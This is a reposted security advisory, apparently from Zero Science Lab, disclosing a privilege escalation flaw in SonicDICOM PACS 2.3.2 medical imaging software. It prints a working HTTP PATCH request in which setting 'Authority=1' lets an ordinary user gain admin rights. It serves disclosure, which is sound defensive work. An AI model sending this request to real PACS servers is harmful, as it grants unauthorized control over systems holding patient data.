SonicDICOM PACS 2.3.2 Remote Vertical Privilege Escalation Exploit

2017.02.12
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

SonicDICOM PACS 2.3.2 Remote Vertical Privilege Escalation Exploit Vendor: JIUN Corporation Product web page: https://www.sonicdicom.com Affected version: 2.3.2 and 2.3.1 Summary: SonicDICOM is PACS software that combines the capabilities of DICOM Server with web browser based DICOM Viewer. Desc: The application suffers from a privilege escalation vulnerability. Normal user can elevate his/her privileges by sending a HTTP PATCH request seting the parameter 'Authority' to integer value '1' gaining admin rights. Tested on: Microsoft-HTTPAPI/2.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2017-5396 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5396.php 22.11.2016 -- PATCH /viewer/api/accounts/update HTTP/1.1 Host: 172.19.0.214 Content-Length: 37 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Escalation Browser/1.0 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: {REMOVED_FOR_BREVITY} Connection: close Id=testingus&Name=peend&Authority=1

References:

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5396.php


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top